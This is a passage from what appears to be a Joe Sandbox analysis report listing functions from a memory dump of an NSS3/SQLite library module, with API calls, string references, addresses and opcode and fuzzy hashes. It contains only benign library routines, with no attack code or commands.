String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: bc93e6981bb0ab1825c11f4620b944df43d257d890b25add09bc00addc537526
Instruction ID: 3f98a7853ba7008089d59bb7e3c0114d64c159f6bba34c06b63ec73b5435bb2b
Opcode Fuzzy Hash: bc93e6981bb0ab1825c11f4620b944df43d257d890b25add09bc00addc537526
Instruction Fuzzy Hash: DD71ADB160420A9FEB00CE56CD81BDA77B5BF88308F044524FD199BF82D335E854CBA6

Function 6C6D2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C6D2D69

Strings

winUnmapfile1, xrefs: 6C6D2F55
winTruncate1, xrefs: 6C6D2EBE
winTruncate2, xrefs: 6C6D2EF8
winSeekFile, xrefs: 6C6D2E9C
winUnmapfile2, xrefs: 6C6D2F7F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: b5bd5f72372fc0acd5843d4fc8efeed38e661f6cbe1b85f58d138a0e59eaf678
Instruction ID: a3d4c29a2a7f57201d45ef597844521227aaeca73023b5a233d62385acda0f8c
Opcode Fuzzy Hash: b5bd5f72372fc0acd5843d4fc8efeed38e661f6cbe1b85f58d138a0e59eaf678
Instruction Fuzzy Hash: DD61B371A002059FDB54CF64DC98AAA77F1FF89318F10853CE919AB780EB31AD16CB95

Function 6C74FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C74F165,?), ref: 6C74FF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C74F165,?), ref: 6C74FF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C74F165,?), ref: 6C74FF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C74F165,?), ref: 6C74FF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C74F165,?), ref: 6C74FFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C74F165,6C81219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C74FFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C74F165,?), ref: 6C7500A6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: 0f2a243ef47e7e671a39445daab1dff67d70fd09620a8748233ba7cd50b47ed7
Instruction ID: 725319671a09a2186f44c7f5280c362e718bd7a85613cbf630ff42488eae984d
Opcode Fuzzy Hash: 0f2a243ef47e7e671a39445daab1dff67d70fd09620a8748233ba7cd50b47ed7
Instruction Fuzzy Hash: CA510471E006559FDB208E58CA807AEB7B5FB4931CFA54239DD19A7B40DB32AC21CBD0

Function 6C70DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C70DF37
EnterCriticalSection.KERNEL32(?), ref: 6C70DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70DF96
PR_SetError.NSS3(00000000,00000000), ref: 6C70E02B
PR_Unlock.NSS3(?), ref: 6C70E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C70E090
PR_Unlock.NSS3(?), ref: 6C70E0AF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 55e7fc2fc7a5a3644ed046f472ae2416f19d46ebcc31431f63cfa414b64e73ac
Instruction ID: db099e7bd4a1a559a17d18ccc6a38af08f03acc5e5438014822d90430e7ec518
Opcode Fuzzy Hash: 55e7fc2fc7a5a3644ed046f472ae2416f19d46ebcc31431f63cfa414b64e73ac
Instruction Fuzzy Hash: C2519FB17007048BE7209E25DA48B6673F5BF54318F248539E9AA47B91D731F848CBD2

Function 6C70BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C70BD1E

Part of subcall function 6C6E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6E2F0A
Part of subcall function 6C6E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6E2F1D

Part of subcall function 6C7257D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C6EB41E,00000000,00000000,?,00000000,?,6C6EB41E,00000000,00000000,00000001,?), ref: 6C7257E0
Part of subcall function 6C7257D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C725843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C70BD8C

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C70BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C70BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70BE3A

Part of subcall function 6C6E3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E3EC2
Part of subcall function 6C6E3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6E3ED6
Part of subcall function 6C6E3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6E3EEE
Part of subcall function 6C6E3E60: PR_CallOnce.NSS3(6C842AA4,6C7412D0), ref: 6C6E3F02
Part of subcall function 6C6E3E60: PL_FreeArenaPool.NSS3 ref: 6C6E3F14
Part of subcall function 6C6E3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6E3F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70BE52

Part of subcall function 6C6E2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6E2CDA,?,00000000), ref: 6C6E2E1E
Part of subcall function 6C6E2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C6E2E33
Part of subcall function 6C6E2E00: TlsGetValue.KERNEL32 ref: 6C6E2E4E
Part of subcall function 6C6E2E00: EnterCriticalSection.KERNEL32(?), ref: 6C6E2E5E
Part of subcall function 6C6E2E00: PL_HashTableLookup.NSS3(?), ref: 6C6E2E71
Part of subcall function 6C6E2E00: PL_HashTableRemove.NSS3(?), ref: 6C6E2E84
Part of subcall function 6C6E2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C6E2E96
Part of subcall function 6C6E2E00: PR_Unlock.NSS3 ref: 6C6E2EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70BE61

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 7655f3ce5057c95d15d3923afc057225dc792921cc82cd498ab126f7a9e0194d
Instruction ID: dcb0c820563301d7e7eccf2b9e84acae838a4976091973772b53af5e9919d66f
Opcode Fuzzy Hash: 7655f3ce5057c95d15d3923afc057225dc792921cc82cd498ab126f7a9e0194d
Instruction Fuzzy Hash: 7A41F4B5A05210AFC710DF28DE85A6AB7E9EF49718F108169F94897712E731ED04CB92

Function 6C72AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C72AB3E,?,?,?), ref: 6C72AC35

Part of subcall function 6C70CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C70CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C72AB3E,?,?,?), ref: 6C72AC55

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C72AB3E,?,?), ref: 6C72AC70

Part of subcall function 6C70E300: TlsGetValue.KERNEL32 ref: 6C70E33C
Part of subcall function 6C70E300: EnterCriticalSection.KERNEL32(?), ref: 6C70E350
Part of subcall function 6C70E300: PR_Unlock.NSS3(?), ref: 6C70E5BC
Part of subcall function 6C70E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C70E5CA
Part of subcall function 6C70E300: TlsGetValue.KERNEL32 ref: 6C70E5F2
Part of subcall function 6C70E300: EnterCriticalSection.KERNEL32(?), ref: 6C70E606
Part of subcall function 6C70E300: PORT_Alloc_Util.NSS3(?), ref: 6C70E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C72AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C72AB3E), ref: 6C72ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C72AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C72AD2B

Part of subcall function 6C70F360: TlsGetValue.KERNEL32(00000000,?,6C72A904,?), ref: 6C70F38B
Part of subcall function 6C70F360: EnterCriticalSection.KERNEL32(?,?,?,6C72A904,?), ref: 6C70F3A0
Part of subcall function 6C70F360: PR_Unlock.NSS3(?,?,?,?,6C72A904,?), ref: 6C70F3D3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: f127c85eeb01202d6f22f230c0dab0b204cb0ef1d81f40a4bc79398b41e9fdd0
Instruction ID: 334f809fc81052de448ce27a727852b41bd05318d0a834077404be83dd4a635f
Opcode Fuzzy Hash: f127c85eeb01202d6f22f230c0dab0b204cb0ef1d81f40a4bc79398b41e9fdd0
Instruction Fuzzy Hash: 3A3139B1E006095FEB048F69CE499AF77B6EF84338B188139E8149BB41EB35DC55C7A1

Function 6C708C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C708C7C

Part of subcall function 6C7A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DC6
Part of subcall function 6C7A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C7F0A27), ref: 6C7A9DD1
Part of subcall function 6C7A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7A9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C708CB0
TlsGetValue.KERNEL32 ref: 6C708CD1
EnterCriticalSection.KERNEL32(?), ref: 6C708CE5
PR_Unlock.NSS3(?), ref: 6C708D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C708D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C708D93

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 0df888fabd86232e37ce08844513b5ca3b90efe8c50c708e8817e59f16f1b114
Instruction ID: 8f25037c6792b178e7b9bcc901c214d2962137f700ee07871116a09ff6df39fd
Opcode Fuzzy Hash: 0df888fabd86232e37ce08844513b5ca3b90efe8c50c708e8817e59f16f1b114
Instruction Fuzzy Hash: 373148B1B01201AFD710AF68DD4979A77F0BF5831CF140236EA1967B90D770A924C7D1

Function 6C749D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C749C5B), ref: 6C749D82

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C749C5B), ref: 6C749DA9

Part of subcall function 6C741340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74136A
Part of subcall function 6C741340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74137E
Part of subcall function 6C741340: PL_ArenaGrow.NSS3(?,6C6DF599,?,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?), ref: 6C7413CF
Part of subcall function 6C741340: PR_Unlock.NSS3(?,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C749C5B), ref: 6C749DCE

Part of subcall function 6C741340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C7413F0
Part of subcall function 6C741340: PL_ArenaGrow.NSS3(?,6C6DF599,?,?,?,00000000,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C741445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C749C5B), ref: 6C749DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C749C5B), ref: 6C749DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C749C5B), ref: 6C749E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C749C5B), ref: 6C749E91

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

Part of subcall function 6C741560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C73FAAB,00000000), ref: 6C74157E
Part of subcall function 6C741560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C73FAAB,00000000), ref: 6C741592
Part of subcall function 6C741560: memset.VCRUNTIME140(?,00000000,?), ref: 6C741600
Part of subcall function 6C741560: PL_ArenaRelease.NSS3(?,?), ref: 6C741620
Part of subcall function 6C741560: PR_Unlock.NSS3(?), ref: 6C741639

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 4e78df6a94b2e0a04ededd3f47f6a486cd9f202a6e82e1088f9b522c1063477b
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: B6417AB5601602AFE700DF15DA44F92BBA9BF55358F148128D8188BFA1EB72E834CB80

Function 6C70DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C70DDEC

Part of subcall function 6C740840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7408B4

PK11_DigestBegin.NSS3(00000000), ref: 6C70DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C70DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C70DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C70DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C70DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70DECC

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: b8d835e271c57fbdfb556e056e34d43a071b7dab88707cd294c86da170db21dd
Instruction ID: 87bcf9e9b2e4e8895ee56cc80645e66ea2916a761e63abe0b2c8cf9fa65e01c4
Opcode Fuzzy Hash: b8d835e271c57fbdfb556e056e34d43a071b7dab88707cd294c86da170db21dd
Instruction Fuzzy Hash: 1931B7F2A002146BDB00AF65AE49BBB76ECDF64608F050135ED09A7742FB31D918C7E6

Function 6C6E7E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6E7E48

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C6E7E5B

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6E7E7B

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C80925C,?), ref: 6C6E7E92

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6E7EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C6E7ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C6E7EFA

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: d568190e775960b25c4d9bb6f24643032f30eba751f120c20228fe12cab3cedf
Instruction ID: cdc712222da8f3c8c826fa914b3cfc72308f666e4dc8f84fecbbcd1f1447b1d7
Opcode Fuzzy Hash: d568190e775960b25c4d9bb6f24643032f30eba751f120c20228fe12cab3cedf
Instruction Fuzzy Hash: FB31C1B2E062159BEB108B659D48B9773A8AF08358F154826DD19EBB02F730EC08C7A4

Function 6C73DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C73D9E4,00000000), ref: 6C73DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C73D9E4,00000000), ref: 6C73DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C73D9E4,00000000), ref: 6C73DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C73DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C73DCAD

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 9fa514b74ecee419bf3bcae38a1c193329bc6092751246ff00112eeb1d685f79
Instruction ID: 95d32b530aab3612b0f908eff60b6aa04deabbffd3fc2c803cab8a0ba08c9d6b
Opcode Fuzzy Hash: 9fa514b74ecee419bf3bcae38a1c193329bc6092751246ff00112eeb1d685f79
Instruction Fuzzy Hash: 1031A1B59212109FD710CF1DD988B92B7F8AFA4358F148438E94CCBB02E771E944CBA5

Function 6C702E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C6FE728,?,00000038,?,?,00000000), ref: 6C702E52
